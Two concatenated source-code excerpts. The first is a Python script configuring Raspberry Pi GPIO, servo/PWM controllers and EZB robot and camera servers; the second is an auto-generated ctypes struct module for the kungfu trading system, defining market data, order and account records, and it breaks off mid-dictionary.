#| 4 | | 7 || 8 | TxD | 14 |
#| | GND | 9 || 10 | RxD | 15 |
#| 17 | CE1.1 | 11 || 12 | CE0.1/BCLK| 18 |
#| 27 | | 13 || 14 | GND | |
#| 22 | | 15 || 16 | | 23 |
#| | 3.3v | 17 || 18 | | 24 |
#| 10 | MO.0 | 19 || 20 | GND | |
#| 9 | MI.0 | 21 || 22 | | 25 |
#| 11 | CLK.0 | 23 || 24 | CE0.0 | 8 |
#| | GND | 25 || 26 | CE1.0 | 7 |
#| 0 | SDA.0 | 27 || 28 | SCL.0 | 1 |
#| 5 | | 29 || 30 | GND | |
#| 6 | | 31 || 32 | | 12 |
#| 13 | | 33 || 34 | GND | |
#| 19 |LRCK/MI.1| 35 || 36 | CE2.1 | 16 |
#| 26 | | 37 || 38 | MO.1/SDI | 20 |
#| | GND | 39 || 40 | CLK.1/SDO | 21 |
#+-----+---------+----++----+-----------+-----+
#| BCM | Name | Physical | Name | BCM |
#+-----+---------+--B Plus--+-----------+-----+
#Generic pins (excluded: uart, i2c, spi, i2s):
ComponentRegistry.ComponentRegistry.register_component("D4", DigitalController.DigitalPort(com, 4))
ComponentRegistry.ComponentRegistry.register_component("D5", DigitalController.DigitalPort(com, 5))
ComponentRegistry.ComponentRegistry.register_component("D6", DigitalController.DigitalPort(com, 6))
ComponentRegistry.ComponentRegistry.register_component("D12", DigitalController.DigitalPort(com, 12))
ComponentRegistry.ComponentRegistry.register_component("D13", DigitalController.DigitalPort(com, 13))
ComponentRegistry.ComponentRegistry.register_component("D22", DigitalController.DigitalPort(com, 22))
ComponentRegistry.ComponentRegistry.register_component("D23", DigitalController.DigitalPort(com, 23))
#Remapped
ComponentRegistry.ComponentRegistry.register_component("D0", DigitalController.DigitalPort(com, 24))
ComponentRegistry.ComponentRegistry.register_component("D1", DigitalController.DigitalPort(com, 25))
ComponentRegistry.ComponentRegistry.register_component("D2", DigitalController.DigitalPort(com, 26))
ComponentRegistry.ComponentRegistry.register_component("D3", DigitalController.DigitalPort(com, 27))
com.start()
else:
import FakeDigitalController
com = FakeDigitalController.FakeDigitalController(logging.DEBUG)
ComponentRegistry.ComponentRegistry.register_controller(com)
for port in range(24):
ComponentRegistry.ComponentRegistry.register_component("D" + str(port), DigitalController.DigitalPort(com, port))
com.start()
def setup_i2c_PCA9685Controller(i2c_com, freq=490):
import PCA9685Controller
com = PCA9685Controller.PCA9685Controller(i2c_com, logging.DEBUG)
ComponentRegistry.ComponentRegistry.register_controller(com)
for port in range(16):
ComponentRegistry.ComponentRegistry.register_component("P"+str(port), PWMController.PWMPort(com, port))
com.start()
com.frequency = freq
def setup_i2c_PCA9685ServoController(i2c_com):
import PCA9685Controller
com = PCA9685Controller.PCA9685ServoController(i2c_com, logging.DEBUG)
ComponentRegistry.ComponentRegistry.register_controller(com)
for port in range(16):
ComponentRegistry.ComponentRegistry.register_component("S"+str(port), ServoController.ServoPort(com, port, 560, 2140))
#bear in mind pwm ports frequency is 50 hz used for servos (frequency is per controller)
for port in range(16):
ComponentRegistry.ComponentRegistry.register_component("P"+str(port), PWMController.PWMPort(com, port))
com.start()
def setup_i2c_PimoroniPanTiltHatServoController(i2c_com):
import PimoroniPanTiltHatServoController
com = PimoroniPanTiltHatServoController.PimoroniPanTiltHatServoController(i2c_com, logging.DEBUG)
ComponentRegistry.ComponentRegistry.register_controller(com)
for port in range(2):
ComponentRegistry.ComponentRegistry.register_component("S"+str(port), ServoController.ServoPort(com, port, 575, 2325))
com.start()
def setup_serial_MaestroServoController(serial_port_name):
import MaestroServoController
com = MaestroServoController.MaestroServoController(serial_port_name, logging.DEBUG)
ComponentRegistry.ComponentRegistry.register_controller(com)
for port in range(24):
#ez-robot servos: 560-2140 us
ComponentRegistry.ComponentRegistry.register_component("S"+str(port), ServoController.ServoPort(com, port, 560, 2140))
com.start()
def setup_SerialPortController(component_name, device_name, baud_rate):
com = SerialPortController.SerialPortController(device_name, baud_rate, logging.DEBUG)
ComponentRegistry.ComponentRegistry.register_component(component_name, com)
ComponentRegistry.ComponentRegistry.register_controller(com)
com.start()
def setup_PyAudioPlayerController(audio_output_index):
os.environ["PA_ALSA_PLUGHW"] = "1"
import PyAudioPlayerController
com = PyAudioPlayerController.PyAudioPlayerController(logging.DEBUG, audio_output_index)
ComponentRegistry.ComponentRegistry.register_component("audio_player", com)
ComponentRegistry.ComponentRegistry.register_controller(com)
com.start()
def main():
logging.basicConfig(format="%(process)d-%(name)s-%(levelname)s-%(message)s", level=logging.INFO)
logging.info("Starting... platform=%s hostname=%s", sys.platform, socket.gethostname())
parser = argparse.ArgumentParser()
parser.add_argument("--ezbaddr", type=str, default="0.0.0.0", help="EZB Server IP address (default: %(default)s)")
parser.add_argument("--ezbport", type=int, default=10023, help="EZB Server TCP port (default: %(default)s)")
parser.add_argument("--camaddr", type=str, default="0.0.0.0", help="Camera Server IP Address (default: %(default)s)")
parser.add_argument("--camport", type=int, default=10024, help="Camera Server TCP Port (default: %(default)s)")
parser.add_argument("--camwidth", type=int, default=640, help="Camera Video's Width (default: %(default)s)")
parser.add_argument("--camheight", type=int, default=480, help="Camera Video's Height (default: %(default)s)")
parser.add_argument("--camfps", type=int, default=15, help="Camera Video's frames per second (default: %(default)s)")
parser.add_argument("--camrotation", type=int, default=0, help="Camera Video's rotation (0, 90, 180, and 270) (default: %(default)s)")
parser.add_argument("--camflip",
default="none",
const="none",
nargs="?",
choices=["none", "horizontal", "vertical", "both"],
help="(default: %(default)s)")
parser.add_argument("--jpgquality", type=int, default=95, help="Jpeg's quality (0-100) (default: %(default)s)")
parser.add_argument("--audio", action='store_true', help="enable audio output (default: %(default)s)")
parser.add_argument("--audiooutputindex", type=int, default=0, help="AudioOutput index (default: %(default)s)")
parser.add_argument("--camtype",
default="none",
const="none",
nargs="?",
choices=["none", "picamera", "videocapture", "fake"],
help="(default: %(default)s)")
parser.add_argument("--videocaptureindex", type=int, default=0, help="VideoCapture index (default: %(default)s)")
parser.add_argument("--uart0", type=str, default=None, help="UART 0's serial device e.g. /dev/serial0 com4 (default: %(default)s)")
parser.add_argument("--uart1", type=str, default=None, help="UART 1's serial device e.g. /dev/serial0 com4 (default: %(default)s)")
parser.add_argument("--uart2", type=str, default=None, help="UART 2's serial device e.g. /dev/serial0 com4 (default: %(default)s)")
parser.add_argument("--pca9685",
default="none",
const="none",
nargs="?",
choices=["none", "servo", "pwm"],
help="servo=controller for servos, pwm=controller for pwm ports (default: %(default)s)")
parser.add_argument("--pantilthat", action='store_true', help="enable Pimoroni Pan-Tilt HAT https://shop.pimoroni.com/products/pan-tilt-hat (default: %(default)s)")
parser.add_argument("--maestro", type=str, default=None, help="enable Pololu Maestro serial device e.g. /dev/ttyACM0 com40 (default: %(default)s)")
args = parser.parse_args()
try:
if args.audio:
setup_PyAudioPlayerController(args.audiooutputindex)
setup_digital_ports()
i2c_com = setup_i2c()
if args.uart0 is not None:
setup_SerialPortController("uart0", args.uart0, 115200)
if args.uart1 is not None:
setup_SerialPortController("uart1", args.uart1, 115200)
if args.uart2 is not None:
setup_SerialPortController("uart2", args.uart2, 115200)
if args.maestro is not None:
###Pololu Mini Maestro 24-Channel USB Servo Controller https://www.pololu.com/product/1356
###Used for 24 servos ports D0..D23
setup_serial_MaestroServoController(args.maestro)
if args.pca9685 == "pwm":
###Adafruit 16-Channel PWM https://www.adafruit.com/product/2327
###Used for PWM ports (0..23)
setup_i2c_PCA9685Controller(i2c_com)
elif args.pca9685 == "servo":
###Used for Servo ports (0..23)
setup_i2c_PCA9685ServoController(i2c_com)
if args.pantilthat:
###Pimoroni Pan-Tilt HAT https://shop.pimoroni.com/products/pan-tilt-hat
###Used to map servo ports D0..D1
setup_i2c_PimoroniPanTiltHatServoController(i2c_com)
EZBTcpServer.start((args.ezbaddr, args.ezbport))
if args.camtype != "none":
EZBCameraServer.start((args.camaddr, args.camport), args)
#time.sleep(3)
input("===> Press Enter to quit...\n")
logging.debug("*** Enter pressed ***")
except KeyboardInterrupt:
print("*** Keyboard Interrupt ***")
except Exception as ex:
logging.fatal("Exception: %s", ex)
logging.info("Terminating")
controllers = ComponentRegistry.ComponentRegistry.Controllers.copy()
controllers.reverse()
for controller in controllers:
logging.info("stopping controller: %s", controller.name)
controller.stop()
logging.info("Terminated")
if __name__ == "__main__":
main()
| 1.8125 | 2 |
python/kungfu/longfist/longfist_structs.py | dfhljf/kungfu | 3 | 12761002 | <gh_stars>1-10
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# auto generated by struct_info_parser.py, please DO NOT edit!!!
from ctypes import *
import longfist_constants as lf
from longfist_structs_sniffer import *
class LFMarketDataField(Structure):
_fields_ = [
("TradingDay", c_char * 13), # 交易日
("InstrumentID", c_char * 31), # 合约代码
("ExchangeID", c_char * 9), # 交易所代码
("ExchangeInstID", c_char * 64), # 合约在交易所的代码
("LastPrice", c_double), # 最新价
("PreSettlementPrice", c_double), # 上次结算价
("PreClosePrice", c_double), # 昨收盘
("PreOpenInterest", c_double), # 昨持仓量
("OpenPrice", c_double), # 今开盘
("HighestPrice", c_double), # 最高价
("LowestPrice", c_double), # 最低价
("Volume", c_int), # 数量
("Turnover", c_double), # 成交金额
("OpenInterest", c_double), # 持仓量
("ClosePrice", c_double), # 今收盘
("SettlementPrice", c_double), # 本次结算价
("UpperLimitPrice", c_double), # 涨停板价
("LowerLimitPrice", c_double), # 跌停板价
("PreDelta", c_double), # 昨虚实度
("CurrDelta", c_double), # 今虚实度
("UpdateTime", c_char * 13), # 最后修改时间
("UpdateMillisec", c_int), # 最后修改毫秒
("BidPrice1", c_double), # 申买价一
("BidVolume1", c_int), # 申买量一
("AskPrice1", c_double), # 申卖价一
("AskVolume1", c_int), # 申卖量一
("BidPrice2", c_double), # 申买价二
("BidVolume2", c_int), # 申买量二
("AskPrice2", c_double), # 申卖价二
("AskVolume2", c_int), # 申卖量二
("BidPrice3", c_double), # 申买价三
("BidVolume3", c_int), # 申买量三
("AskPrice3", c_double), # 申卖价三
("AskVolume3", c_int), # 申卖量三
("BidPrice4", c_double), # 申买价四
("BidVolume4", c_int), # 申买量四
("AskPrice4", c_double), # 申卖价四
("AskVolume4", c_int), # 申卖量四
("BidPrice5", c_double), # 申买价五
("BidVolume5", c_int), # 申买量五
("AskPrice5", c_double), # 申卖价五
("AskVolume5", c_int), # 申卖量五
]
class LFL2MarketDataField(Structure):
_fields_ = [
("TradingDay", c_char * 9), # 交易日
("TimeStamp", c_char * 9), # 时间戳
("ExchangeID", c_char * 9), # 交易所代码
("InstrumentID", c_char * 31), # 合约代码
("PreClosePrice", c_double), # 昨收盘价
("OpenPrice", c_double), # 今开盘价
("ClosePrice", c_double), # 收盘价
("IOPV", c_double), # 净值估值
("YieldToMaturity", c_double), # 到期收益率
("AuctionPrice", c_double), # 动态参考价格
("TradingPhase", c_char), # 交易阶段 char
("OpenRestriction", c_char), # 开仓限制 char
("HighPrice", c_double), # 最高价
("LowPrice", c_double), # 最低价
("LastPrice", c_double), # 最新价
("TradeCount", c_double), # 成交笔数
("TotalTradeVolume", c_double), # 成交总量
("TotalTradeValue", c_double), # 成交总金额
("OpenInterest", c_double), # 持仓量
("TotalBidVolume", c_double), # 委托买入总量
("WeightedAvgBidPrice", c_double), # 加权平均委买价
("AltWeightedAvgBidPrice", c_double), # 债券加权平均委买价
("TotalOfferVolume", c_double), # 委托卖出总量
("WeightedAvgOfferPrice", c_double), # 加权平均委卖价
("AltWeightedAvgOfferPrice", c_double), # 债券加权平均委卖价格
("BidPriceLevel", c_int), # 买价深度
("OfferPriceLevel", c_int), # 卖价深度
("BidPrice1", c_double), # 申买价一
("BidVolume1", c_double), # 申买量一
("BidCount1", c_int), # 实际买总委托笔数一
("BidPrice2", c_double), # 申买价二
("BidVolume2", c_double), # 申买量二
("BidCount2", c_int), # 实际买总委托笔数二
("BidPrice3", c_double), # 申买价三
("BidVolume3", c_double), # 申买量三
("BidCount3", c_int), # 实际买总委托笔数三
("BidPrice4", c_double), # 申买价四
("BidVolume4", c_double), # 申买量四
("BidCount4", c_int), # 实际买总委托笔数四
("BidPrice5", c_double), # 申买价五
("BidVolume5", c_double), # 申买量五
("BidCount5", c_int), # 实际买总委托笔数五
("BidPrice6", c_double), # 申买价六
("BidVolume6", c_double), # 申买量六
("BidCount6", c_int), # 实际买总委托笔数六
("BidPrice7", c_double), # 申买价七
("BidVolume7", c_double), # 申买量七
("BidCount7", c_int), # 实际买总委托笔数七
("BidPrice8", c_double), # 申买价八
("BidVolume8", c_double), # 申买量八
("BidCount8", c_int), # 实际买总委托笔数八
("BidPrice9", c_double), # 申买价九
("BidVolume9", c_double), # 申买量九
("BidCount9", c_int), # 实际买总委托笔数九
("BidPriceA", c_double), # 申买价十
("BidVolumeA", c_double), # 申买量十
("BidCountA", c_int), # 实际买总委托笔数十
("OfferPrice1", c_double), # 申卖价一
("OfferVolume1", c_double), # 申卖量一
("OfferCount1", c_int), # 实际卖总委托笔数一
("OfferPrice2", c_double), # 申卖价二
("OfferVolume2", c_double), # 申卖量二
("OfferCount2", c_int), # 实际卖总委托笔数二
("OfferPrice3", c_double), # 申卖价三
("OfferVolume3", c_double), # 申卖量三
("OfferCount3", c_int), # 实际卖总委托笔数三
("OfferPrice4", c_double), # 申卖价四
("OfferVolume4", c_double), # 申卖量四
("OfferCount4", c_int), # 实际卖总委托笔数四
("OfferPrice5", c_double), # 申卖价五
("OfferVolume5", c_double), # 申卖量五
("OfferCount5", c_int), # 实际卖总委托笔数五
("OfferPrice6", c_double), # 申卖价六
("OfferVolume6", c_double), # 申卖量六
("OfferCount6", c_int), # 实际卖总委托笔数六
("OfferPrice7", c_double), # 申卖价七
("OfferVolume7", c_double), # 申卖量七
("OfferCount7", c_int), # 实际卖总委托笔数七
("OfferPrice8", c_double), # 申卖价八
("OfferVolume8", c_double), # 申卖量八
("OfferCount8", c_int), # 实际卖总委托笔数八
("OfferPrice9", c_double), # 申卖价九
("OfferVolume9", c_double), # 申卖量九
("OfferCount9", c_int), # 实际卖总委托笔数九
("OfferPriceA", c_double), # 申卖价十
("OfferVolumeA", c_double), # 申卖量十
("OfferCountA", c_int), # 实际卖总委托笔数十
("InstrumentStatus", c_char * 7), # 合约状态
("PreIOPV", c_double), # 昨净值估值
("PERatio1", c_double), # 市盈率一
("PERatio2", c_double), # 市盈率二
("UpperLimitPrice", c_double), # 涨停价
("LowerLimitPrice", c_double), # 跌停价
("WarrantPremiumRatio", c_double), # 权证溢价率
("TotalWarrantExecQty", c_double), # 权证执行总数量
("PriceDiff1", c_double), # 升跌一
("PriceDiff2", c_double), # 升跌二
("ETFBuyNumber", c_double), # ETF申购笔数
("ETFBuyAmount", c_double), # ETF申购数量
("ETFBuyMoney", c_double), # ETF申购金额
("ETFSellNumber", c_double), # ETF赎回笔数
("ETFSellAmount", c_double), # ETF赎回数量
("ETFSellMoney", c_double), # ETF赎回金额
("WithdrawBuyNumber", c_double), # 买入撤单笔数
("WithdrawBuyAmount", c_double), # 买入撤单数量
("WithdrawBuyMoney", c_double), # 买入撤单金额
("TotalBidNumber", c_double), # 买入总笔数
("BidTradeMaxDuration", c_double), # 买入委托成交最大等待时间
("NumBidOrders", c_double), # 买方委托价位数
("WithdrawSellNumber", c_double), # 卖出撤单笔数
("WithdrawSellAmount", c_double), # 卖出撤单数量
("WithdrawSellMoney", c_double), # 卖出撤单金额
("TotalOfferNumber", c_double), # 卖出总笔数
("OfferTradeMaxDuration", c_double), # 卖出委托成交最大等待时间
("NumOfferOrders", c_double), # 卖方委托价位数
]
class LFL2IndexField(Structure):
_fields_ = [
("TradingDay", c_char * 9), # 交易日
("TimeStamp", c_char * 9), # 行情时间(秒)
("ExchangeID", c_char * 9), # 交易所代码
("InstrumentID", c_char * 31), # 指数代码
("PreCloseIndex", c_double), # 前收盘指数
("OpenIndex", c_double), # 今开盘指数
("CloseIndex", c_double), # 今日收盘指数
("HighIndex", c_double), # 最高指数
("LowIndex", c_double), # 最低指数
("LastIndex", c_double), # 最新指数
("TurnOver", c_double), # 参与计算相应指数的成交金额(元)
("TotalVolume", c_double), # 参与计算相应指数的交易数量(手)
]
class LFL2OrderField(Structure):
_fields_ = [
("OrderTime", c_char * 9), # 委托时间(秒)
("ExchangeID", c_char * 9), # 交易所代码
("InstrumentID", c_char * 31), # 合约代码
("Price", c_double), # 委托价格
("Volume", c_double), # 委托数量
("OrderKind", c_char * 2), # 报单类型
]
class LFL2TradeField(Structure):
_fields_ = [
("TradeTime", c_char * 9), # 成交时间(秒)
("ExchangeID", c_char * 9), # 交易所代码
("InstrumentID", c_char * 31), # 合约代码
("Price", c_double), # 成交价格
("Volume", c_double), # 成交数量
("OrderKind", c_char * 2), # 报单类型
("OrderBSFlag", c_char * 2), # 内外盘标志
]
class LFBarMarketDataField(Structure):
_fields_ = [
("TradingDay", c_char * 9), # 交易日
("InstrumentID", c_char * 31), # 合约代码
("UpperLimitPrice", c_double), # 涨停板价
("LowerLimitPrice", c_double), # 跌停板价
("StartUpdateTime", c_char * 13), # 首tick修改时间
("StartUpdateMillisec", c_int), # 首tick最后修改毫秒
("EndUpdateTime", c_char * 13), # 尾tick最后修改时间
("EndUpdateMillisec", c_int), # 尾tick最后修改毫秒
("Open", c_double), # 开
("Close", c_double), # 收
("Low", c_double), # 低
("High", c_double), # 高
("Volume", c_double), # 区间交易量
("StartVolume", c_double), # 初始总交易量
]
class LFQryPositionField(Structure):
_fields_ = [
("BrokerID", c_char * 11), # 经纪公司代码
("InvestorID", c_char * 19), # 投资者代码
("InstrumentID", c_char * 31), # 合约代码
("ExchangeID", c_char * 9), # 交易所代码
]
class LFRspPositionField(Structure):
_fields_ = [
("InstrumentID", c_char * 31), # 合约代码
("YdPosition", c_int), # 上日持仓
("Position", c_int), # 总持仓
("BrokerID", c_char * 11), # 经纪公司代码
("InvestorID", c_char * 19), # 投资者代码
("PositionCost", c_double), # 持仓成本
("HedgeFlag", c_char), # 投机套保标志 LfHedgeFlagType
("PosiDirection", c_char), # 持仓多空方向 LfPosiDirectionType
]
class LFInputOrderField(Structure):
_fields_ = [
("BrokerID", c_char * 11), # 经纪公司代码
("UserID", c_char * 16), # 用户代码
("InvestorID", c_char * 19), # 投资者代码
("BusinessUnit", c_char * 21), # 业务单元
("ExchangeID", c_char * 9), # 交易所代码
("InstrumentID", c_char * 31), # 合约代码
("OrderRef", c_char * 21), # 报单引用
("LimitPrice", c_double), # 价格
("Volume", c_int), # 数量
("MinVolume", c_int), # 最小成交量
("TimeCondition", c_char), # 有效期类型 LfTimeConditionType
("VolumeCondition", c_char), # 成交量类型 LfVolumeConditionType
("OrderPriceType", c_char), # 报单价格条件 LfOrderPriceTypeType
("Direction", c_char), # 买卖方向 LfDirectionType
("OffsetFlag", c_char), # 开平标志 LfOffsetFlagType
("HedgeFlag", c_char), # 投机套保标志 LfHedgeFlagType
("ForceCloseReason", c_char), # 强平原因 LfForceCloseReasonType
("StopPrice", c_double), # 止损价
("IsAutoSuspend", c_int), # 自动挂起标志
("ContingentCondition", c_char), # 触发条件 LfContingentConditionType
("MiscInfo", c_char * 30), # 委托自定义标签
]
class LFRtnOrderField(Structure):
_fields_ = [
("BrokerID", c_char * 11), # 经纪公司代码
("UserID", c_char * 16), # 用户代码
("ParticipantID", c_char * 11), # 会员代码
("InvestorID", c_char * 19), # 投资者代码
("BusinessUnit", c_char * 21), # 业务单元
("InstrumentID", c_char * 31), # 合约代码
("OrderRef", c_char * 21), # 报单引用
("ExchangeID", c_char * 11), # 交易所代码
("LimitPrice", c_double), # 价格
("VolumeTraded", c_int), # 今成交数量
("VolumeTotal", c_int), # 剩余数量
("VolumeTotalOriginal", c_int), # 数量
("TimeCondition", c_char), # 有效期类型 LfTimeConditionType
("VolumeCondition", c_char), # 成交量类型 LfVolumeConditionType
("OrderPriceType", c_char), # 报单价格条件 LfOrderPriceTypeType
("Direction", c_char), # 买卖方向 LfDirectionType
("OffsetFlag", c_char), # 开平标志 LfOffsetFlagType
("HedgeFlag", c_char), # 投机套保标志 LfHedgeFlagType
("OrderStatus", c_char), # 报单状态 LfOrderStatusType
("RequestID", c_int), # 请求编号
]
class LFRtnTradeField(Structure):
_fields_ = [
("BrokerID", c_char * 11), # 经纪公司代码
("UserID", c_char * 16), # 用户代码
("InvestorID", c_char * 19), # 投资者代码
("BusinessUnit", c_char * 21), # 业务单元
("InstrumentID", c_char * 31), # 合约代码
("OrderRef", c_char * 21), # 报单引用
("ExchangeID", c_char * 11), # 交易所代码
("TradeID", c_char * 21), # 成交编号
("OrderSysID", c_char * 31), # 报单编号
("ParticipantID", c_char * 11), # 会员代码
("ClientID", c_char * 21), # 客户代码
("Price", c_double), # 价格
("Volume", c_int), # 数量
("TradingDay", c_char * 13), # 交易日
("TradeTime", c_char * 13), # 成交时间
("Direction", c_char), # 买卖方向 LfDirectionType
("OffsetFlag", c_char), # 开平标志 LfOffsetFlagType
("HedgeFlag", c_char), # 投机套保标志 LfHedgeFlagType
]
class LFOrderActionField(Structure):
_fields_ = [
("BrokerID", c_char * 11), # 经纪公司代码
("InvestorID", c_char * 19), # 投资者代码
("InstrumentID", c_char * 31), # 合约代码
("ExchangeID", c_char * 11), # 交易所代码
("UserID", c_char * 16), # 用户代码
("OrderRef", c_char * 21), # 报单引用
("OrderSysID", c_char * 31), # 报单编号
("RequestID", c_int), # 请求编号
("ActionFlag", c_char), # 报单操作标志 char
("LimitPrice", c_double), # 价格
("VolumeChange", c_int), # 数量变化
("KfOrderID", c_int), # Kf系统内订单ID
]
class LFQryAccountField(Structure):
_fields_ = [
("BrokerID", c_char * 11), # 经纪公司代码
("InvestorID", c_char * 19), # 投资者代码
]
class LFRspAccountField(Structure):
_fields_ = [
("BrokerID", c_char * 11), # 经纪公司代码
("InvestorID", c_char * 19), # 投资者代码
("PreMortgage", c_double), # 上次质押金额
("PreCredit", c_double), # 上次信用额度
("PreDeposit", c_double), # 上次存款额
("preBalance", c_double), # 上次结算准备金
("PreMargin", c_double), # 上次占用的保证金
("Deposit", c_double), # 入金金额
("Withdraw", c_double), # 出金金额
("FrozenMargin", c_double), # 冻结的保证金(报单未成交冻结的保证金)
("FrozenCash", c_double), # 冻结的资金(报单未成交冻结的总资金)
("FrozenCommission", c_double), # 冻结的手续费(报单未成交冻结的手续费)
("CurrMargin", c_double), # 当前保证金总额
("CashIn", c_double), # 资金差额
("Commission", c_double), # 手续费
("CloseProfit", c_double), # 平仓盈亏
("PositionProfit", c_double), # 持仓盈亏
("Balance", c_double), # 结算准备金
("Available", c_double), # 可用资金
("WithdrawQuota", c_double), # 可取资金
("Reserve", c_double), # 基本准备金
("TradingDay", c_char * 9), # 交易日
("Credit", c_double), # 信用额度
("Mortgage", c_double), # 质押金额
("ExchangeMargin", c_double), # 交易所保证金
("DeliveryMargin", c_double), # 投资者交割保证金
("ExchangeDeliveryMargin", c_double), # 交易所交割保证金
("ReserveBalance", c_double), # 保底期货结算准备金
("Equity", c_double), # 当日权益
("MarketValue", c_double), # 账户市值
]
DataFieldMap = {
'LFL2MarketDataField': {
'OfferVolumeA': 'd',
'TotalOfferNumber': 'd',
'WithdrawSellAmount': 'd',
'BidCount3': 'i',
'BidCount2': 'i',
'BidCount1': 'i',
'BidCount7': 'i',
'BidCount6': 'i',
'BidCount5': 'i',
'BidCount4': 'i',
'BidVolume7': 'd',
'BidVolume6': 'd',
'BidCount9': 'i',
'BidCount8': 'i',
'BidVolume3': 'd',
'BidVolume2': 'd',
'BidVolume1': 'd',
'TradeCount': 'd',
'BidPrice6': 'd',
'PreIOPV': 'd',
'TimeStamp': 'c9',
'TradingDay': 'c9',
'BidCountA': 'i',
'OpenInterest': 'd',
'BidVolumeA': 'd',
'NumOfferOrders': 'd',
'OfferVolume4': 'd',
'OfferVolume5': 'd',
'OfferVolume6': 'd',
'OfferVolume7': 'd',
'OfferVolume1': 'd',
'OfferVolume2': 'd',
'OfferVolume3': 'd',
'OfferVolume8': 'd',
'OfferVolume9': 'd',
'ETFSellMoney': 'd',
'TotalTradeVolume': 'd',
'PriceDiff1': 'd',
'PriceDiff2': 'd',
'OfferPriceA': 'd',
'BidPriceLevel': 'i',
'TotalOfferVolume': 'd',
'OfferPriceLevel': 'i',
'InstrumentStatus': 'c7',
'NumBidOrders': 'd',
'ETFSellAmount': 'd',
'WithdrawSellNumber': 'd',
'AltWeightedAvgBidPrice': 'd',
'WeightedAvgBidPrice': 'd',
'OfferPrice8': 'd',
'BidVolume9': 'd',
'WithdrawBuyMoney': 'd',
'OfferPrice4': 'd',
'BidVolume8': 'd',
'OfferPrice6': 'd',
'OfferPrice7': 'd',
'OfferPrice1': 'd',
'OfferPrice2': 'd',
'OfferPrice3': 'd',
'WithdrawBuyAmount': 'd',
'BidVolume5': 'd',
'BidVolume4': 'd',
'BidPrice9': 'd',
'BidPrice8': 'd',
'BidPrice5': 'd',
'BidPrice4': 'd',
'BidPrice7': 'd',
'AltWeightedAvgOfferPrice': 'd',
'BidPrice1': 'd',
'TotalWarrantExecQty': 'd',
'BidPrice3': 'd',
'BidPrice2': 'd',
'LowerLimitPrice': 'd',
'OpenPrice': 'd',
'WithdrawSellMoney': 'd',
'OfferTradeMaxDuration': 'd',
'OfferCount7': 'i',
'WarrantPremiumRatio': 'd',
'ExchangeID': 'c9',
'ETFSellNumber': 'd',
'AuctionPrice': 'd',
'OfferPrice9': 'd',
'YieldToMaturity': 'd',
'OfferPrice5': 'd',
'TradingPhase': 'c',
'BidPriceA': 'd',
'PERatio2': 'd',
'TotalBidVolume': 'd',
'PERatio1': 'd',
'OfferCount8': 'i',
'OfferCount9': 'i',
'OfferCount6': 'i',
'LowPrice': 'd',
'OfferCount4': 'i',
'OfferCount5': 'i',
'OfferCount2': 'i',
'OfferCount3': 'i',
'TotalBidNumber': 'd',
'OfferCount1': 'i',
'WithdrawBuyNumber': 'd',
'OpenRestriction': 'c',
'BidTradeMaxDuration': 'd',
'PreClosePrice': 'd',
'UpperLimitPrice': 'd',
'WeightedAvgOfferPrice': 'd',
'InstrumentID': 'c31',
'ClosePrice': 'd',
'HighPrice': 'd',
'TotalTradeValue': 'd',
'IOPV': 'd',
'LastPrice': 'd',
'ETFBuyNumber': 'd',
'ETFBuyMoney': 'd',
'ETFBuyAmount': 'd',
'OfferCountA': 'i',
},
'LFRtnTradeField': {
'InstrumentID': 'c31',
'ExchangeID': 'c11',
'ParticipantID': 'c11',
'TradeID': 'c21',
'TradingDay': 'c13',
'BusinessUnit': 'c21',
'HedgeFlag': lf.LfHedgeFlagTypeMap,
'Price': 'd',
'UserID': 'c16',
'Direction': lf.LfDirectionTypeMap,
'ClientID': 'c21',
'OrderRef': 'c21',
'Volume': 'i',
'InvestorID': 'c19',
'BrokerID': 'c11',
'OrderSysID': 'c31',
'TradeTime': 'c13',
'OffsetFlag': lf.LfOffsetFlagTypeMap,
},
'LFRspAccountField': {
'Mortgage': 'd',
'ExchangeDeliveryMargin': 'd',
'FrozenMargin': 'd',
'WithdrawQuota': 'd',
'PositionProfit': 'd',
'Commission': 'd',
'Equity': 'd',
'CashIn': 'd',
'Available': 'd',
'InvestorID': 'c19',
'PreCredit': 'd',
'PreMortgage': 'd',
'ExchangeMargin': 'd',
'PreMargin': 'd',
'DeliveryMargin': 'd',
'preBalance': 'd',
'TradingDay': 'c9',
'BrokerID': 'c11',
'Deposit': 'd',
'Withdraw': 'd',
'Balance': 'd',
'Reserve': 'd',
'PreDeposit': 'd',
'Credit': 'd',
'MarketValue': 'd',
'ReserveBalance': 'd',
'CurrMargin': 'd',
'FrozenCommission': 'd',
'CloseProfit': 'd',
'FrozenCash': 'd',
},
'LFL2IndexField': {
'InstrumentID': 'c31',
'ExchangeID': 'c9',
'HighIndex': 'd',
'TimeStamp': 'c9',
'CloseIndex': 'd',
'PreCloseIndex': 'd',
'LastIndex': 'd',
'TradingDay': 'c9',
'OpenIndex': 'd',
'TotalVolume': 'd',
'LowIndex': 'd',
'TurnOver': 'd',
},
'LFL2OrderField': {
'InstrumentID': 'c31',
'OrderTime': 'c9',
'OrderKind': 'c2',
'Price': 'd',
'ExchangeID': 'c9',
'Volume': 'd',
},
'LFQryPositionField': {
'InstrumentID': 'c31',
'InvestorID': 'c19',
'ExchangeID': 'c9',
'BrokerID': 'c11',
},
'LFInputOrderField': {
'InstrumentID': 'c31',
'ContingentCondition': lf.LfContingentConditionTypeMap,
'ExchangeID': 'c9',
'MinVolume': 'i',
'OffsetFlag': lf.LfOffsetFlagTypeMap,
'OrderPriceType': lf.LfOrderPriceTypeTypeMap,
'BusinessUnit': 'c21',
'HedgeFlag': lf.LfHedgeFlagTypeMap,
'IsAutoSuspend': 'i',
'ForceCloseReason': lf.LfForceCloseReasonTypeMap,
'UserID': 'c16',
'Direction': lf.LfDirectionTypeMap,
'LimitPrice': 'd',
'OrderRef': 'c21',
'Volume': 'i',
'InvestorID': 'c19',
'VolumeCondition': lf.LfVolumeConditionTypeMap,
'TimeCondition': lf.LfTimeConditionTypeMap,
'BrokerID': 'c11',
'MiscInfo': 'c30',
'StopPrice': 'd',
},
'LFRtnOrderField': {
'InstrumentID': 'c31',
'ExchangeID': 'c11',
'ParticipantID': 'c11',
'OrderPriceType': lf.LfOrderPriceTypeTypeMap,
'BusinessUnit': 'c21',
'HedgeFlag': lf.LfHedgeFlagTypeMap,
'VolumeTotalOriginal': 'i',
'RequestID': 'i',
'UserID': 'c16',
'Direction': lf.LfDirectionTypeMap,
'LimitPrice': 'd',
'OrderRef': 'c21',
'InvestorID': 'c19',
'VolumeCondition': lf.LfVolumeConditionTypeMap,
'TimeCondition': lf.LfTimeConditionTypeMap,
'BrokerID': 'c11',
